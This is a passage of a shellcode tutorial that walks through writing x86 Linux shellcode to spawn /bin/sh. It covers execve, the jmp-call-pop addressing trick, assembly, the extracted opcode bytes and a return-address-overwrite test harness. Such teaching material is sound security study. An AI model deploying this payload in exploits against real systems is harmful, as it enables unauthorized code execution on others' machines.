5. Spawning a shell

Now it's time to write a shellcode to do something a little more useful. For instance, we can write a shellcode to spawn a shell (/bin/sh) and eventually exit cleanly. The simplest way to spawn a shell is using the execve(2) syscall. Let's take a look at its usage from its man page:

$ man 2 execve
EXECVE(2)                          Linux Programmer's Manual                         EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int execve(const char *filename, char *const argv [], char *const envp[]);

DESCRIPTION
       execve() executes the program pointed to by filename.  filename must be either a binary
       executable, or a script starting with a line of the form "#!  interpreter  [arg]".   In
       the  latter  case,  the interpreter must be a valid pathname for an executable which is
       not itself a script, which will be invoked as interpreter [arg] filename.

       argv is an array of argument strings passed to the new program.  envp is  an  array  of
       strings,  conventionally  of the form key=value, which are passed as environment to the
       new program.  Both, argv and envp must be terminated by a null pointer.   The  argument
       vector  and  environment can be accessed by the called program's main function, when it
       is defined as int main(int argc, char *argv[], char *envp[]).
[...]

To recap, we need to pass it three arguments:

  1. a pointer to the name of the program to execute (in our case a pointer to the string "/bin/sh");
  2. a pointer to an array of strings to pass as arguments to the program (the first argument must be argv[0], i.e. the name of the program itself). The last element of the array must be a null pointer;
  3. a pointer to an array of strings to pass as environment to the program. These strings are usually in the form "key=value" and the last element must be a null pointer.

Therefore, spawning a shell from a C program looks like:

get_shell.c
#include <unistd.h>

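int main() {
        char *args[2];
        args[0] = "/bin/sh";            /* argv[0]: the name of the program */
        args[1] = NULL;                 /* the array must end with a null pointer */
        execve(args[0], args, NULL);    /* on success, execve(2) does not return */
        return 1;                       /* reached only if execve(2) failed */
}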

In the above example we passed to execve(2):

  1. a pointer to the string "/bin/sh";
  2. an array of two pointers (the first pointing to the string "/bin/sh" and the second null);
  3. a null pointer (we don't need any environment variables).

Now let's build it and see it work:

$ gcc -o get_shell get_shell.c
$ ./get_shell
sh-2.05b$ exit
$

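Ok, we got our shell! Now let's see how to use this system call in assembler (since there are only three arguments, we can pass them in registers). We immediately have to tackle two problems:

  1. the string "/bin/sh" must be terminated by a null byte, but the shellcode itself should not contain any null bytes;
  2. we don't know at which address the shellcode, and therefore the string "/bin/sh", will end up in memory.

To solve the first problem, we will make our shellcode able to put the null bytes in the right places at run-time. To solve the second problem, instead, we will use relative memory addressing.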

The "classic" method to retrieve the address of the shellcode is to begin with a CALL instruction. The first thing a CALL instruction does is, in fact, to push the address of the next byte onto the stack (so that the RET instruction can load this address back into EIP upon return from the called function); execution then jumps to the address specified by the operand of the CALL instruction. This way we obtain our starting point: the address of the first byte after the CALL is the last value pushed onto the stack, and we can easily retrieve it with a POP instruction! Therefore, the overall structure of the shellcode will be:

jmp short mycall      ; Immediately jump to the call instruction

shellcode:
    pop   esi         ; Store the address of "/bin/sh" in ESI
    [...]

mycall:
    call  shellcode   ; Push the address of the next byte onto the stack: the next
    db    "/bin/sh"   ;   byte is the beginning of the string "/bin/sh"

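Let's see what it does:

  1. the JMP at the beginning transfers execution straight to the CALL instruction at "mycall";
  2. the CALL pushes the address of the byte that follows it, i.e. the first byte of the string "/bin/sh", onto the stack and jumps back to "shellcode";
  3. the POP removes that address from the stack and stores it in ESI.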

Now we can fill the structure of the shellcode with something useful. Let's see, step by step, what it will have to do:

  1. zero out EAX in order to have some null bytes available;
  2. terminate the string with a null byte, copying it from EAX (we will use the AL register);
  3. set up the array ECX will have to point to; it will be made up of the address of the string and a null pointer. We will accomplish this by writing the address of the string (stored in ESI) in the first free bytes right below the string, followed by the null pointer (once again we will use the zeroes in EAX);
  4. store the number of the syscall (0x0b) in EAX;
  5. store the first argument to execve(2) (i.e. the address of the string, saved in ESI) in EBX;
  6. store the address of the array in ECX (ESI+8);
  7. store the address of the null pointer in EDX (ESI+12);
  8. execute the interrupt 0x80.

This is the resulting assembly code:

get_shell.asm
jmp short    mycall               ; Immediately jump to the call instruction

shellcode:
    pop        esi                ; Store the address of "/bin/sh" in ESI
    xor        eax, eax           ; Zero out EAX
    mov byte   [esi + 7], al      ; Write the null byte at the end of the string

    mov dword  [esi + 8],  esi    ; [ESI+8], i.e. the memory immediately below the string
                                  ;   "/bin/sh", will contain the array pointed to by the
                                  ;   second argument of execve(2); therefore we store in
                                  ;   [ESI+8] the address of the string...
    mov dword  [esi + 12], eax    ; ...and in [ESI+12] the NULL pointer (EAX is 0)
    mov        al,  0xb           ; Store the number of the syscall (11) in EAX
    lea        ebx, [esi]         ; Copy the address of the string in EBX
    lea        ecx, [esi + 8]     ; Second argument to execve(2)
    lea        edx, [esi + 12]    ; Third argument to execve(2) (NULL pointer)
    int        0x80               ; Execute the system call

mycall:
    call       shellcode          ; Push the address of "/bin/sh" onto the stack
    db         "/bin/sh"

Now let's extract the opcodes:

$ nasm -f elf get_shell.asm
$ objdump -d get_shell.o

get_shell.o:     file format elf32-i386

Disassembly of section .text:

00000000 <shellcode-0x2>:
   0:   eb 18                   jmp    1a <mycall>

00000002 <shellcode>:
   2:   5e                      pop    %esi
   3:   31 c0                   xor    %eax,%eax
   5:   88 46 07                mov    %al,0x7(%esi)
   8:   89 76 08                mov    %esi,0x8(%esi)
   b:   89 46 0c                mov    %eax,0xc(%esi)
   e:   b0 0b                   mov    $0xb,%al
  10:   8d 1e                   lea    (%esi),%ebx
  12:   8d 4e 08                lea    0x8(%esi),%ecx
  15:   8d 56 0c                lea    0xc(%esi),%edx
  18:   cd 80                   int    $0x80

0000001a <mycall>:
  1a:   e8 e3 ff ff ff          call   2 <shellcode>
  1f:   2f                      das    
  20:   62 69 6e                bound  %ebp,0x6e(%ecx)
  23:   2f                      das    
  24:   73 68                   jae    8e <mycall+0x74>
$

insert them in the C program:

get_shell.c
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46"
                   "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                   "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
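int main()
{
        int *ret;
        ret = (int *)&ret + 2;          /* two words above ret: assumed to be main()'s saved return address */
        (*ret) = (int)shellcode;        /* overwrite it, so that main() "returns" into the shellcode */
}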

and test it:

$ gcc -o get_shell get_shell.c
$ ./get_shell
sh-2.05b$ exit
$